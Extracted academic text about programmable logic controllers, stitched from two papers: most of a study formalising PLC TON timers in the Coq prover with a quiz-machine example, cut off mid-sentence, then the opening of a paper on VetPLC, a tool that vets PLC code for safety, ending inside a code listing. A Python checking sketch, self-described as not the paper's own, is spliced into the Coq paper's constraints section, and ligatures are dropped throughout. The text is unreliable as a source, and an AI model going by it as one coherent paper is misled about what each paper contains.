[7] Krämer, B.J., Völker, N.: A highly dependable computing architecture for safety-critical control applications. Real-Time Systems 13(3) (1997) 237-251
[8] Jiménez-Fraustro, F., Rutten, E.: A synchronous model of IEC 61131 PLC languages in SIGNAL. In: ECRTS '01: Proceedings of the 13th Euromicro Conference on Real-Time Systems, Washington, DC, USA, IEEE Computer Society (2001) 135
[9] IEC International Standard 1131-3: Programmable Controllers, Part 3: Programming Languages. (1993)
[10] Siemens: S7-200 Programmable Controller System Manual. Siemens (2003)
[11] Mader, A.: A classification of PLC models and applications. In: WODES 2000: 5th Workshop on Discrete Event Systems, Kluwer Academic Publishers (2000) 21-23
Formalization and Veri cation of PLC Timers in Coq Hai Wan Key Lab for ISS of MOE, Tsinghua National Laboratory for Information Science and Technology, School of Software, Tsinghua University, Beijing, China Email: wanh03 @mails.tsinghua.edu.cnGang Chen Lingcore Laboratory Portland, USA Email: gangchensh @gmail.comXiaoyu Song ECE Dept, Portland State University Portland, USA Email: songpisa @yahoo.comMing Gu Key Lab for ISS of MOE, Tsinghua National Laboratory for Information Science and Technology, School of Software, Tsinghua University Beijing, China Email: [email protected] Keywords -PLC; TON-Timer; Modeling; Coq I. I NTRODUCTION Programmable logic controllers (PLCs) are widely used for safety critical applications in various industrial elds. The correctness and reliability of PLC programs are of great importance. The use of timers is one of the distinguished features of PLCs programs, since the notion of time is mainly introduced by timers in PLC systems. Hence, the main focus of this paper is the modeling and veri cation of PLC programs with timers. Based on the operational semantics, in [1] PLC programs are translated into timed automata. They proposed two ways to model timers: one is to treat timers as symbolic function block calls and the other is to model timers as separate timed automata. Model checker UPPAAL is employed to verify the model. In [3], timed automata are used to model Sequential Function Chart programs. In their work, the use of timers is restricted each step is associated with a timer and the timer is taken for guarding the transitions in other words, timers are not used in a restricted form. A special automaton that orients real-time systems PLC-automaton is developed to model the speci cations of real-time ap- plications. Structured Text programs can be automatically This work was supported in part by the Chinese National 973 Plan under grant No. 2004CB719400, the NSF of China under grants No. 60553002, 60635020 and 90718039.generated from PLC-automata [4]. They did not model PLC programs with timers, but use timers to implement PLC- automata. In [5] condition/event systems are adopted to model PLC programs. There is an assumption that timers can be started only at the beginning of the calculation phase. In [6], the Ladder Diagram programs are investigated and time is treated implicitly. Model checker SMV was used to verify the model. The methods mentioned above are all related to the model checking technologies. Besides model checking, theorem proving is alsoem- ployed in veri cation of PLC Programs. In [7] the theorem system Isabelle/HOL was used to model and verify PLC pro- grams. Modular veri cation method is adopted in the paper. They had a simple model of time, because they assumed that the current value increases monotonously and there is no reset action during this process. No explicit model of a timer was given. In [8], the synchronous language SIGNAL is used to model Structured Text and Function Block Diagram programs. They did not treat timer instructions. This paper is an attempt of formally proving the cor- rectness of PLC programs with timer control. The Coq [2] theorem prover is chosen as our formal veri cation tool. It allows problem speci cation, program formalization and property proving in a single working environment. A timed quiz machine problem is employed as the case study example. 
Informally, the main properties under investigation are statements of the forms that, if a proper sequence of stimuli are received by the PLC program, then some expected outcomes will be observed. The problem becomes involved as the timer input depends on its output in previous cycle. By the nature of the TON timer, its input signals have to be kept stable during the timing period. That is, their values have to be constant between the start of timing process and the timeout point. However, the cyclic program structure does not make this property obvious. To make the proving process manageable without loss of generality, we will introduce three abstract axioms at an appropriate level to characterize 2009 33rd Annual IEEE International Computer Software and Applications Conference 0730-3157/09 $25.00 2009 IEEE DOI 10.1109/COMPSAC.2009.49315 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. the behavior of TON timer (see section IV for details). As the rst step in this formalization, we assume the existence of a function fwhich maps the start of each scan cycle to its time point. This function is abstract and it needs only to satisfy a monotonic requirement. Such an assumption allows us to establish the relation between scan cycles (see next section for the descriptions of PLC and the notion of scan cycle) and real time points without explicitly calculating the exact time period of each cycle. It should be noted that the adoption of this function relies on the programming practice that the timer output is sampled only once in the program. A subtle issue in this formal model is the selection of the starting and ending points of each scan cycle. In the PLC convention, a scan cycle starts with the input phase, followed by the execution phase and the output phase. As a result, the de nition of the function f encounters many choices. It can map the start of the input phase to time, or map the start of the execution phase or the start of the output phase to time. Such a selection would give different interpretations to timer axioms and will in uence the forms of system properties. A further discussion on this issue can be found in section IV-B and IV-E. With the preparation given above, we can give an informal description on the axiomatic assumptions of TON timer: if the main input to the timer turns off, so does the timeout signal; if the preset timeout period is passed and that the main timer input has been kept ON during this period, then the timeout signal will turn on (or keep on) at next cycle; if the timeout signal will be turned on at next cycle, then the main input signal must have been kept on for a period larger than the preset timing period. The precise description of these hypothesis is presented in section IV-E2. These assumptions characterize the global behavior of TON timer. They appear both reasonable and suf cient for the veri cation of most timer-related problems. From this study, it made clear that formal PLC veri cation can bene t from Coq in many aspects. First, Coq gives us enough expressive power to model PLC programs with timers at any desired abstract level. A formal timer model, expressed in a set of Coq axioms or hypothesis, can abstract away the differences among timers with different resolutions. The abstraction facilitates the modeling and veri cation process. 
Second, Coq allows us to prove parameterized properties, which is a useful feature not directly supported by model checking. Third, it is easy to model objects by parameterized Coq modules so that speci cations and proofs can be reused and scalable. The rest of the paper is organized as follows. In the following section, we give a short introduction to PLC and its timers. A quiz machine example is described in Section III. The example is employed throughout the paper. In Section IV, we describe the method of modeling timersin the theorem prover Coq in detail. Section V shows the complete model of the example program and outlines the proof. Finally, Section VI concludes the paper. II. P ROGRAMMABLE LOGIC CONTROLLER AND TIMERS A PLC system typically consists of a CPU, a memory and input/output points through which the system communicates with its outside environment. The execution of a PLC program is an in nite loop in which each iteration is called scan cycle. Typically, each scan cycle can be divided into three phases: 1)Input phase during which PLC system reads the values of sensors and copies them into memory which forms a snapshot of the environment. These values do not change throughout the rest of the cycle. Input phase takes the same time in each scan cycle. 2)Calculation phase during which the PLC system executes the instructions and writes back the results into memory. At the beginning of each calculation phase, PLC system does some preparations, such as self-check and timer instructions (for the timers whose base is 10ms). The preparations take the same time. 3)Output phase during which PLC maps the results into actuators. Output phase takes the same time in each scan cycle. There are ve standard programming languages for PLC [9] among which the Ladder Diagram (LD) is the most widely used programming language. From now on, we concentrate on the LD language. As an embedded system, the real-time aspect of PLC system is ensured by the use of timers.1There are mainly three kinds of timers in S7-200[10]: TON-timer, TONR- timer, and TOF-timer. In this paper, we focus on the TON- timers. The other two kinds of timers can be treated in a similar manner. A TON-timer has two input ports: IN that indicates whether the timer is enabled and PT that is the preset value of the timer. There are two output ports: one for the current value and the other for the timer bit. The characteristics of a TON-timer are informally described as follows: 1)A TON-timer counts time (i.e. increase its current value) when its IN is ON and it is updated. 2)A TON-timer s timer bit is OFF and its current value is set to zero when its IN is OFF. 3)If a TON-timer s current value is greater than or equal to its PT, its timer bit is ON. 4)A TON-timer continues counting after its PT is reached, and stops counting when the maximum value 32767 is reached. 1Since there are many different kinds of PLCs in the industry and the instructions used in these PLCs are different from each other, in order to ease the discussion, from now on, we focus on S7-200 which is a kind of PLC produced by the Siemens company. In some cases, time is ensured by the use of interruptions. We do not consider this case here. 316 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. T33 I2.0 IN PT 3TON I2.0 T33(current) T33(bit)PT=3 PT=3 Maximum Value=32767 Figure 1. 
TON timer and its behivour According to the user manual of S7-200, a TON-timer and its behavior are demonstrated in Fig.1. A TON-timer has three resolutions: 1ms, 10ms, and 100ms. The behaviors of timers with different resolutions are different. For the timer with time base of 1ms, it updates every 1ms asynchronously to the scan cycle. In other words, the timer bit can be updated multiple times during one scan cycle. For the 10ms timer, it only updates at the beginning of each scan cycle. For the 100ms timer, its current value is updated only when the instruction is executed. The user manual emphasizes that, for the 100ms timer, its instruction should be executed one and only one time during each cycle. In section IV-E, we propose a set of axioms to model the behavior of a TON-timer. This axiom set appears suf cient for proving many properties of practical interests. III. A NILLUSTRATIVE EXAMPLE In this section, we show a quiz machine problem as an illustrative example to explain some basic notions of LD language, control ow graph of program, and the modeling process of TON-timers. A quiz machine is an equipment used in a contest which involves a host and several players. The host uses his buttons to start and reset a contest. Every player controls his button which is associated with a light. The button is used for the player to vie to answer and the light is used to indicate that the corresponding player has the chance to answer. After the host starts a contest, the rst player who presses his button within the prede ned time will turn on an associated light. If more than one players press the buttons at the same time, the machine should inform the host to restart another contest. If during the prede ned time there is no one pressing the button, the machine should inform the host that time is out and keep all players lights off even if some of them press their buttons. The ladder diagram implementation of quiz machine with three players and a prede ned time of 3 seconds are shown in Fig.2. As shown in Fig.2, a LD program consists of a set of rungs. There are 10 rungs in the example program. Each rung can be seen as a connection between logical checkers(contacts or relays) and actuators (coils). There are two kinds of relays: normally open contact (- j j-) and normally closed contact (- j=j-). Each relay or coil is associated with a bit which can be 0 or 1. For example, the rst rung contains three relays (which are associated with bits m1, i1andi0respectively) and one coil (associated with bit m1). Normally, each rung has only one coil. If a path can be traced between the left side of the rung and the coil, through ON relays, the rung is true and the bit of output coil is 1. A normally open relay is ON iff its bit is 1. A normally closed relay is ON iff its bit is 0. Intuitively, each rung can be understood as a assignment consists of the bits in the rung. For example, the rst rung can be expressed by m1= (i0^m1)_ :i1. In the program, the start and reset buttons are associated withi0andi1respectively (i.e. if start button is pressed then i0is 1). The buttons for players are i2,i3andi4.o1,o2, ando3are used to control the corresponding lights l1,l2, andl3, respectively. o0denotes whether the time is out. The system s inner states consist of ve bits: from m1tom5.m1 indicates whether the contest begins. TON-timer t1counts when m1is 1 and is used to record the escaped time after the host presses start button. The timer bit of t1is 1 when the escaped time extends the prede ned timeout. 
m2,m3and m4denote whether play 1, play 2or play 3 rst presses his button respectively. m5represents whether there is a player that presses his button within the prede ned timeout. Three time related program properties should be satis ed. The host presses the reset button and, after a while, he presses the start button. Between the time he presses the start button and the timeout: if there is only one who rst press his button, the corresponding light will turn on and the other lights stay off; if at least two players rst press their buttons at the same, their lights will be turned on and the other lights stay off; if no one presses the button, the light indicating timeout will turn on and the other lights stay off. IV. M ODELING PLC P ROGRAMS WITH TIMERS Following the criteria proposed in [11], we show our method of modeling PLC programs with timers in three steps: 1)programming language fragments that are used and assumptions and constraints of the PLC programs; we also propose a preprocess that makes PLC programs satisfy the constraints. 2)how to model the cyclic operation mode; 3)how to model the timer. We rst introduce the control ow graph and its associated table which give us a formal base for the description and veri cation of constraints. 317 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. i0 m1 m1 IN TON t1 +3000 PT m1 t1 i2 m2 100ms TON m5 m2 m2 m3 m4 m5 ( ) m5 ( ) m2 o1 ( ) m3 o2 ( ) m4 o3 ( ) t1 o0 m5 i1 ( ) ( ) m1 t1 i3 m3 m5 m3 ( ) m1 t1 i4 m4 m5 m4 ( ) m1 m1 Figure 2. The Ladder Diagram of Quiz Mechine A. Control Flow Graph of PLC Programs The structure of a PLC program can be described by a control ow graph (CFG). As an example, the CFG of the quiz program is shown in Fig.3. There is a special node N0 that represents the preparation phase at the beginning of the calculation phase. Every program s CFG has such a node, since every scan cycle contains a preparation phase. Each of the rest nodes denotes a rung in the program. Since there is no loop and case constructs in the program, the CFG is a simple cycle (note the cyclic behavior of PLC systems). Every node iis associated with three sets: refi,defi, and times i, where refiis the set of variables node irefers to, defiis the set of variables node ide nes and times iis the set of all possible time spans used to reach node ifrom the beginning of the calculation phase. Intuitively, refiis the set of variables used in the right hand side of the assignment related to rung i, while defiis that appear in the left hand side of the assignment. Since each rung has only one coin, the cardinality of defiis always one. Tab.I shows the sets for each node. The superscript iof each variable in the refi means the variable is de ned at node i. For instance, m1 1 inref2means m1used at node 2is de ned at node 1. We assume the executions of each rung cost the same time which is 3ms.2CFG and the table form a formal representation of a PLC program s structure. The timer bits are special variables in PLC. Comparing to other variables, their values can change multiple times without explicit assignments. If 1ms TON-timer is chosen for the program in Fig.2, we need to add t1to every defi since it can update asynchronously to the scan cycle and make some modi cations to t 1in each refi. The result table 2The execution times for different rungs can be different, but this doesn t effect the modeling and veri cation process. Figure 3. 
The CFG of the quiz machine program Table I ref S AND def S FOR THE CFG OF QUIZ MACHINE Node No. ref def times 0 fg fg f0msg 1 fi0; i1; m1 1g fm1gf3msg 2 fm1 1g ft1gf6msg 3 ft2 1; i2; m6 5; m1 1; m3 2gfm2gf9msg 4 ft2 1; i3; m6 5; m1 1; m4 3gfm3gf12msg 5 ft2 1; i4; m6 5; m1 1; m5 4gfm4gf15msg 6 fm1 1; m3 2; m4 3; m5 4; m6 5gfm5gf18msg 7 fm3 2g fo1gf21msg 8 fm4 3g fo2gf24msg 9 fm5 4g fo3gf27msg 10 ft2 1; m6 5g fo0gf30msg is shown in Tab.II. B. Assumptions and Constraints We articulate the assumptions and constraints below and explain how to modify the program that does not meet these properties to make them satisfy these properties: 1)The executions of the same instruction take the same time. 2)There is no loop in one scan cycle, i.e. if we remove N0, the resulted CFG is an acyclic graph. 3)During one scan cycle, the values of a TON-timer used by several instructions are the same. This can be stated formally as 8n1n2n3n4:Nodes; t :Timers :tn32 refn1_tn42refn2!n3=n4. If the program does not satisfy the constraint, this could cause unfair treatment to players in the quiz competition. Given a program does not satisfy the constraint, the following modi cations should be made to the program: 1ms TON-timer. For each 1ms TON-timer t, a new variable mis introduced and a new rung Table II ref S AND def S FOR THE CFG OF QUIZ MACHINE WITH 1MS TON- TIMER Node No. ref def times 0 fg ft1g f0msg 1 fi0; i1; m1 1g fm1; t1gf3msg 2 fm1 1g ft1g f6msg 3 ft2 1; i2; m6 5; m1 1; m3 2gfm2; t1gf9msg 4 ft3 1; i3; m6 5; m1 1; m4 3gfm3; t1gf12msg 5 ft4 1; i4; m6 5; m1 1; m5 4gfm4; t1gf15msg 6 fm1 1; m3 2; m4 3; m5 4; m6 5gfm5; t1gf18msg 7 fm3 2g fo1; t1gf21msg 8 fm4 3g fo2; t1gf24msg 9 fm5 4g fo3; t1gf27msg 10 ft9 1; m6 5g fo0; t1gf30msg 318 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. Table III ref S AND def S FOR THE CFG OF MODIFIED QUIZ MACHINE WITH 1MS TON- TIMER Node No. ref def times 0 fg ft1g f0msg 1 fi0; i1; m1 1g fm1; t1gf3msg 2 fm1 1g ft1g f6msg 3 ft2 1g fm6g f9msg 4 fm3 6; i2; m6 5; m1 1; m3 2gfm2; t1gf12msg 5 fm3 6; i3; m6 5; m1 1; m4 3gfm3; t1gf15msg 6 fm3 6; i4; m6 5; m1 1; m5 4gfm4; t1gf18msg 7 fm1 1; m3 2; m4 3; m5 4; m6 5gfm5; t1gf21msg 8 fm3 2g fo1; t1gf24msg 9 fm4 3g fo2; t1gf27msg 10 fm5 4g fo3; t1gf30msg 11 fm3 6; m6 5g fo0; t1gf33msg j j tj (m) is inserted before the rst reference to t. All the references to tare replaced by the references of m. For example, if 1ms TON- timer is used in the program shown in Fig.2, the program does not satisfy this constraint for the values used at node 3 and 4 are different i.e. in Tab.II the superscripts of t1at nodes 3 and 4 are different. The table of the program after modi cation is shown in Tab.III from which it can be veri ed that the program holds the constraint. 10ms and 100ms TON-timers. No modi cation is needed. 4)For each node iin CFG that de nes a timer, i.e. the timer is in defi, and referred by other nodes in the same cycle, the cardinality of times iis 1. In other words, for such node there is one and only one path to reach it. This constraint ensures that the time intervals used to reach the same timer instruction from the beginning of the scan cycle are the same. 5)Each relay can be set value at most once per scan cycle. Modi cations described in [8] can be made to programs that do not satisfy this constraint. All the constraints can be veri ed based on the CFG and its associated table. 
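As a sketch of how such a check could be mechanized on the table (our own illustration, not the paper's tooling; the row encoding, in which each reference is stored as a (variable, defining node) pair and 'times' is the set of possible time offsets, is an assumption):

# Hypothetical encoding of a CFG row: (node, refs, defs, times).
Row = tuple  # (int, set of (str, int) pairs, set of str, set of int)

def check_timer_constraints(table, timers):
    ok = True
    for t in timers:
        # Constraint 3: every reference to timer t must see the same definition.
        def_nodes = {d for (_, refs, _, _) in table for (v, d) in refs if v == t}
        if len(def_nodes) > 1:
            ok = False
        # Constraint 4: a node that defines t and is referenced in the same cycle
        # must be reachable at exactly one time offset.
        for (node, _, defs, times) in table:
            referenced = any(v == t and d == node
                             for (_, refs, _, _) in table for (v, d) in refs)
            if t in defs and referenced and len(times) != 1:
                ok = False
    return ok

Feeding the rows of Tab.II into such a check would flag the 1ms-timer version (two different definitions of t1 are referenced), while the modified program of Tab.III would pass.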
It can be verified that the programs corresponding to Tab.I and Tab.III satisfy all the above constraints. We will discuss the reasons for these assumptions and constraints in the following sections.
C. Cyclic Behavior, Relays and Time
According to [11], there are four ways to model the scan cycle: models without scan cycle, models with explicit scan cycle, models with implicit scan cycle, and models
Towards_Automated_Safety_Vetting_of_PLC_Code_in_Real-World_Plants.pdf
Safety violations in programmable logic controllers (PLCs), caused either by faults or attacks, have recently garnered significant attention. However, prior efforts at PLC code vetting suffer from many drawbacks. Static analyses and verification cause significant false positives and cannot reveal specific runtime contexts. Dynamic analyses and symbolic execution, on the other hand, fail due to their inability to handle real-world PLC programs that are event-driven and timing sensitive. In this paper, we propose VetPLC, a temporal context-aware, program analysis-based approach to produce timed event sequences that can be used for automatic safety vetting. To this end, we (a) perform static program analysis to create timed event causality graphs in order to understand causal relations among events in PLC code and (b) mine temporal invariants from data traces collected in Industrial Control System (ICS) testbeds to quantitatively gauge temporal dependencies that are constrained by machine operations. Our VetPLC prototype has been implemented in 15K lines of code. We evaluate it on 10 real-world scenarios from two different ICS settings. Our experiments show that VetPLC outperforms state-of-the-art techniques and can generate event sequences that can be used to automatically detect hidden safety violations.
I. INTRODUCTION
Industrial control systems (ICS) play an essential role in modern society. In the new era of Industry 4.0 [12], computerized control systems have become the backbone of crucial infrastructures such as power grids, transportation and manufacturing sectors. Compared to traditional ICS that were constructed using fixed electronic circuits, programmable logic controllers (PLCs) have brought flexibility, configurability and automation to these domains. However, this freedom has also introduced complexity, and thus uncertainty, to safety-critical physical plants. Unexpected logic errors may cause serious problems such as fatal collisions or massive explosions. Reports have shown that anomalous ICS behaviors have resulted in loss of life on real-world factory floors [11], [19]. In addition, security problems are highly coupled with safety issues in the ICS domain. In fact, physical damage is one of the major goals of security breaches in ICS. Compared to attacks targeting consumers or IT systems, which often aim to make profits or steal data, cyberattacks on factory floors are intended to sabotage physical infrastructures. Real-world incidents, including Stuxnet [36], the German Steel Mill Cyber Attack [49] and the Ukrainian Power Grid Attack [50], have shown that although adversaries must first leverage security penetration techniques to infiltrate the digital layers of modern plants, they often attempt to manipulate critical safety parameters, such as the frequency of nuclear centrifuges, and to trigger benign but faulty code, in order to cause serious damage. Hence, there is a need for detecting situations where such safety violations can occur. Due to the complexity of contemporary ICS, which involves interactions between PLCs and various other machines, we need automated mechanisms to find such problems. While there exists work [24], [28], [30], [31], [42], [44], [57], [58], [61], [63], [65] that aims to statically verify PLC logic in a formal manner, such static analysis techniques suffer from significant false positives since they are unable to reason about runtime execution contexts. For instance, they may detect potential problematic paths in the code that are infeasible at runtime.
In addition, the behavior of ICS is strictly constrained by physical limits at runtime (e.g., velocity, temperature, etc.) as well as by changes to these properties. To address these limitations, prior work [35], [39], [45], [62] has explored the usage of dynamic simulations of runtime behaviors to detect PLC safety violations. In addition, recent work [43], [54] has enabled symbolic execution on PLC code. Despite their apparent effectiveness in finding bugs in independent PLC programs, these techniques are limited because they overlook an important fact: a real-world PLC never works alone. On the contrary, it collaborates with other programmable components on the factory floor, such as robots, CNCs or even other PLCs, to carry out certain tasks. Hence, PLC logic is not only triggered by internal data inputs but also driven by external events due to the coordination and communication among multiple units. Unfortunately, the aforementioned work focuses mainly on the testing or resolution of input values and not on the complete event space of multiple collaborating components, and thus cannot automatically exercise real-life PLC programs. To address this problem, we propose VetPLC, a temporal context-aware, program analysis-based system that automatically constructs timed event sequences. These sequences can then enable automated dynamic safety vetting of PLC code. Although they are still lacking in the PLC context, automated dynamic analysis and symbolic execution on event-driven programs have been well studied in the smartphone [27], [46], [55], [67] and web [51], [66] domains. To model non-deterministic events, researchers have proposed to automatically generate event sequences of different orders, based upon program models [67] or testing [27], [46], [51], [55], [66], to drive program execution. Yet permutation of events is insufficient to describe the conditions that lead to safety violations in PLC code. The timings at which events are delivered matter. This is because PLC events have implicit temporal dependencies caused by both intrinsic durations and external physical constraints. Our key observation is that multiple event sequences of the same valid order may or may not lead to safety violations due to the different timings between events. Thus, generating timed event sequences is a requisite step to successfully reveal safety issues in PLC code. In this way, VetPLC complements the prior research on dynamic analyses and symbolic execution that searches merely the value space in PLC code. It further introduces novel techniques to explore the timed event space so as to effectively exercise and examine PLC programs.
Speci cally, (a)to uncover the order of triggering events, we rst perform static program analyses on controller code (ofthe various interconnected units), including PLC and robot and generate timed event causality graphs to represent the temporal dependencies of cross-device events; (b)to quantitatively model the timing of events, we analyze the controller code to extract internal time limits, collect runtime data traces from physical ICS systems and then leverage data mining to recover temporal invariants; (c)combining this timing model with causality graphs, we then create timed event sequences that canserve as inputs for any dynamic PLC code analyses; to enableautomated safety vetting, we formally de ne and manuallycraft safety speci cations based upon expert knowledge andconduct runtime veri cation on PLC execution traces. It is worth noting that previous research has also sought to create timed event sequences for testing event-driven real-time programs. Event sequences have been produced fromeither manually crafted speci cations [48] or pro ling program execution time [52]. In contrast, we automatically extract event ordering and timing using program analyses and data mining, and further enable this technique in the new domain of PLCsand broadly in the context of ICS. To the best of our knowledge, we are the rst to enable timing-aware safety vetting on event-driven time-constrained PLC code for real-world ICS, in particular, via extracting eventtemporalities from program logic and physical environments. We have implemented V ETPLC in 15K lines of code 7K lines of C++ and 8K lines of Java. To demonstrate theef cacy of our approach, we apply it to 10 real-world scenarioson two ICS testbeds that are of completely different physicalcompositions: (i)the SMART [47] testbed is a scaled-down yet fully functional automotive production line and (ii)theFischertechnik testbed replicates a consecutive part processing facility controlled by multiple collaborative PLCs. Note thatthe PLC programs under examination remain intact, and wedid not introduce vulnerable code into them. Experimentalresults show that V ETPLC outperforms the state-of-the-art techniques and can effectively produce event sequences that lead to deep and authentic safety bugs, which are already hidden in real-world PLC code due to developers mistakes. In summary, this paper makes the following contributions: We explore physical ICS testbeds to gain an important insight: real-world controller code is event-driven and timing-sensitive. We are the rst to automate dynamic safety vetting of real-world PLC code via the creation of timed event sequences. We use custom static analyses, that address the speci c programming paradigms of PLCs, to extract causal rela-tionships among events. To the best of our knowledge, this is the rst work thatdistills temporal dependencies in physical ICS testbeds. We have demonstrated the effectiveness of V ETPLC on two different types of real-world ICS testbeds: V ETPLC has found organic vulnerabilities in real-world testbeds. II. B ACKGROUND Programmable Logic Controller. A programmable logic controller [18] is the core control unit of a large number of modern automation systems. It can be either used as a separated master controller or integrated as a slave controller to other machines such as CNCs. The basic functionality ofa PLC is to repeatedly generate control commands based oninput signals and internal control logic. 
On startup, a PLC is running in an in nite loop where each iteration, called a scan cycle , consists of three major phases. 1) Input: PLC reads inputs from external events (e.g., sensors) and buffers them in memory. 2) Computation: All variable values are xed. The PLC then invokes its logic program and calculates new variable states based on the buffered inputs and their current states. 3) Output: The PLC writes the computed new states into output memory in order to start the next cycle. PLC programming languages follow the international stan- dard IEC 61131-3 [10]. It de nes three graphical languages and two textual languages. All of the languages share IEC 61131-3 common elements and can be translated between each. In particular, the Structured Text (ST) is a high-leveltextual language that syntactically resembles Pascal (Figure 2)and thus is known for its understandability [20]. Notice,however, although an ST program resembles those written in other high-level languages, its data ow is very different dueto the existence of scan cycles . Since PLC variables are kept intact during the computation phase, value changes caused by logic code do not become effective until the next cycle. In effect, in any scan cycle, a PLC variable bears two versions :the current version from the last cycle is effective at thepresent time; the new version records all the changes in thecurrent round and eventually replaces the current one during  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. the output phase. As a result, 1) there exists no data ow within one scan cycle; 2) data ow happens between two neighboringcycles and the current value of a variable may be the result of any assignment instructions in the last cycle. Industrial Robot. An industrial robot is essential for per- forming various actuations, such as assembly, pick-and-place,packaging, etc. Robot programming languages of individualvendors are proprietary but in general fall into two cate-gories: high-level and low-level. High-level languages, such asKAREL for FANUC robots or RAPID for ABB, are in uenced by the Pascal syntax. Low-level code is assembly-like, and is developed through teach pendants which are handheld devices directly connected to robots. Aside from common program instructions (e.g., assignments, conditional or unconditional jumps and function calls), these programs all employ special motion instructions to guide physical movements and use wait instructions to enable delays and control timings. While Robot programs can be launched via a main function, in practice they are triggered dynamically by input events. The mapping between triggering signals and call targets is con gured using teach pendants. Without loss of generality, we hereafter ex- plain robot inner-workings based upon pick-and-place robots from FANUC that has the most industrial robots installedworldwide [56]. Speci cally, we focus on its teach pendant(TP) language, depicted in Figure 8, which is the de facto standard to program FANUC robots [1]. Cross-Device Communication. A PLC and a remote device communicate via signals using industrial network protocols, such as EtherNet/IP [8]. The remote device opens multiple pins for inputs and outputs. For example, a FANUC robot canenable 512 bits of digit inputs (DI) and 512 bits of digit outputs(DO). On the PLC side, each remote pin is mapped as a baseaddress (i.e., IP address) plus an offset. 
Thus, PLC code can control a remote device by directly accessing these mapped I/O bits. The I/O mappings are automatically con gured whena remote device is added to an ICS environment supervisedby a PLC. Once its IP address is determined, the underlying EtherNet/IP protocol takes the responsibility to recognize the I/Os on this device and bind them to PLC variables. III. P ROBLEM STATEMENT &A PPROACH OVERVIEW A. Motivating Example We motivate our problem using our SMART testbed [47], depicted in Figure 1. This testbed represents a fully functional assembly line that produces model cars. It consists of a gantry crane, a circular conveyor belt, 2 pick-and-place robots, 3 CNC (Computer Numerical Control) machines, and is controlled by a PLC. Particularly, it is equipped with Allen Bradley PLC from Rockwell Automation1and FANUC robots2. It is worth noting that the SMART testbed is a miniature of real-world automotive manufacturing sectors. It has been established and constantly upgraded for over 20 years, and has been used for numerous projects over the decades. This testbed 1Leading PLC supplier in North America w/ 60% of the market share [17] 2The most popular industrial robots worldwide [1] Fig. 1: SMART Testbed for Manufacturing Model Vehicles was developed by engineers from Rockwell Automation, fac- ulty and graduate students: the hardware components and theway they connect precisely resemble those on real-world fac- tory oors; a large body of controller code (e.g., robot motion, CNC operation, RFID I/O, etc.) was directly borrowed from industry practices [7]. The delity of this control system has been veri ed through consistent collaboration with Rockwell Automation. Physical Compositions. The gantry system serves as the entry and exit points of the testbed. It delivers empty palletsto CNC machine #1 to start the manufacturing processes and,eventually, it removes the produced parts from the conveyor. The circular conveyor belt is always on and keeps moving the pallets around the robots and CNCs. The robots and CNCmachines are organized into two cells to accomplish differenttasks (e.g., molding, ipping, etc.), where Cell 1 is comprisedof Robot #1 and CNC #1, and Cell 2 contains the rest. Immediately in front of each cell are RFID transceivers that can sense the presence of incoming pallets, empty or loaded, because RFID tags are attached to both pallets and parts. The RFID tag on a part maintains a numerical value indicating itsnext manufacturing process. A pallet stopper is also installed to every cell to block moving pallets. By default, the stopper is always enabled to block any arriving pallets unless a signalthat indicates otherwise is received. PLC and Robot Logics. Figure 2 and Figure 8 (in Ap- pendix A) show in part the control logic of the PLC and Robot #1 in Cell 1, respectively. The code snippets depicthow a processed part is passed from CNC to conveyor. Since a raw part has been delivered by the gantry to the CNC for processing, the PLC code (Figure 2) is now expecting to receive the processed part and deliver it to the next cellusing an empty pallet. The coordination between PLC androbot is realized through events. In order to receive and send these signals, 6 input variables (Ln.3-7,52), 2 output variables (Ln.8-9) and 4 internal variables (Ln.11-13,49) are declared.In each scan cycle, the PLC rst clears the output variablesduring initialization (Ln.16-19) and then checks all the inputvariables sequentially to update the outputs (Ln.21-44). 
More concretely, Ln.21-23 rst update the availability of an empty pallet at Cell 1 ( Pallet Arrival ) by checking the presence of a pallet ( Pallet Sensor ) and also the absence of a part ( NOT(Part Sensor) ). If, however, an incoming pallet is already loaded with a part (Ln.25-27), the PLC will send a signal via Retract Stopper to retract the stopper and let this pallet pass through. When an empty pallet has arrived at  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. 1PROGRAM CELL1 2 VAR 3 Pallet_Sensor AT %IX0.1 : BOOL; 4 Part_Sensor AT %IX0.2 : BOOL; 5 CNC_Part_Ready AT %IX0.3 : BOOL; 6 Robot_Ready AT %IX0.4 : BOOL; //DO[6] 7 Part_AtConveyor AT %IX0.5 : BOOL; //DO[2] 8 Retract_Stopper AT %QX0.1: BOOL; 9 Deliver_Part AT %QX0.2 : BOOL; //DI[0] 10 11 Pallet_Arrival AT %MX0.1 : BOOL; 12 Update_Part_Process AT %MX0.2 : BOOL; 13 Update_Complete AT %MX0.3 : BOOL; 14 END_VAR 15 16 Pallet_Arrival := false ; 17 Retract_Stopper := false ; 18 Deliver_Part := false ; 19 Update_Part_Process := false ; 20 21 IF Pallet_Sensor AND NOT(Part_Sensor) THEN 22 Pallet_Arrival := true ; 23 END_IF; 24 25 IF Part_Sensor THEN 26 Retract_Stopper := true ; 27 END_IF; 28 29 IF Pallet_Arrival AND CNC_Part_Ready AND Robot_Ready AND NOT(Part_AtConveyor) THEN 30 Deliver_Part := true ; 31 Update_Part_Process := true ; 32 CNC_Part_Ready := false ; 33 Robot_Ready := false ; 34 END_IF; 35 36 IF Update_Part_Process THEN 37 //Call subroutine to update process No. 38 UPDATE_PART(2); 39 END_IF; 40 41 IF Update_Complete AND Part_AtConveyor THEN 42 Retract_Stopper := true ; 43 Update_Complete := false ; 44 END_IF; 45END_PROGRAM 46 47PROGRAM UPDATE_PART 48 VAR_INPUT 49 Part_Process AT %MD50 : DWORD; 50 END_VAR 51 VAR 52 RFID_IO_Complete AT %IX0.6 : BOOL; 53 Update_Complete AT %MX0.3 : BOOL; 54 END_VAR 55 //Perform 15-step I/O operations on RFID 56 ... 57 IF RFID_IO_Complete THEN 58 Update_Complete := true ; 59 